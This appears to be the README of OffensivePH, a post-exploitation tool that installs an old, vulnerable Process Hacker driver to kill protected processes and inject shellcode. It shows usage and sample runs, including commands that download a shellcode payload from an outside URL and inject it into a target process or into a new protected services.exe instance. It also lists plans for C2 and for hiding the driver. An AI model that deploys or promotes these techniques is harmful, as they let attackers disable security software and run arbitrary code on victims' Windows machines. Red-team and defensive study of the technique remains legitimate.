OffensivePH - use old Process Hacker driver to bypass several user-mode access controls

Overview


OffensivePH is a post-exploitation tool that utilizes an old Process Hacker driver to bypass several user-mode access controls.

Usage

  • Compile OffensivePH with VS2019 (tested).
  • Execute with Admin privileges.
  • offensiveph.exe: standalone tool that can be used as a shellcode loader or process killer.
  • Hook2Kph.dll: a DLL that can be injected into your process to redirect several standard API calls to IOCTLs. Tools like sRDI can be used to convert Hook2Kph.dll into shellcode and inject it into your attacker process.
  • OffensivePH extracts the old Process Hacker driver from its resource section into the current directory under the name kph.sys and creates a service to install the driver. After execution, the service and the file should be deleted automatically.
offensiveph.exe [-kill|-peb|-hijack|-apcinject] [<PID>] [<URL>]
	-kill		: Kill process (can kill PPLs)
	-peb		: Read PEB of a process
	-hijack		: Inject shellcode using thread execution hijacking
	-apcinject	: Inject shellcode into a new services.exe (WinTCB-PPL) instance
  • Kill processes
> offensiveph.exe -kill 8228
# OffensivePH
-------------------------------------------------
[*] Driver path: C:\Users\RedSection\kph.sys
[*] Connected to KprocessHacker Driver
[*] Trying to terminate pid: 8228
[+] KphTerminateProcess is SUCCESSFUL
[*] Service and file are removed
  • Inject shellcode by using Hijack Thread execution
> offensiveph.exe -hijack 8412 http://192.168.56.100/calc-clean.bin
# OffensivePH
-------------------------------------------------
[*] Driver path: C:\Users\RedSection\kph.sys
[*] Connected to KprocessHacker Driver
[+] Connecting to URL for downloading payload
[+] Process 8412 thread is hijacked to execute payload
[*] Service and file are removed
  • Inject shellcode into a new services.exe instance
> offensiveph.exe -apcinject http://192.168.56.100/calc-clean.bin
# OffensivePH
-------------------------------------------------
[*] Driver path: C:\Users\RedSection\kph.sys
[*] Connected to KprocessHacker Driver
[+] Process 652 token is duplicated as Impersonation Token!
[+] Connecting to URL for downloading payload
[+] Protected Shellcode Host Process: 6520
[*] Service and file are removed

References

This repo contains a lot of code and inspiration from the original Process Hacker code.

TODO

  • Reflective DLLs and C2 implementation
  • Hiding Kph Driver
Comments
  • Failed to connect KProcessHacker Driver

    C:\Users\max\Desktop>offensiveph.exe -kill 4952

    OffensivePH

    [*] Driver path: C:\Users\max\Desktop\kph.sys
    [-] Failed to connect KProcessHacker Driver. Exiting...
    [*] Service and file are removed

    C:\Users\max\Desktop>

    opened by wgetnz
Owner

Red Section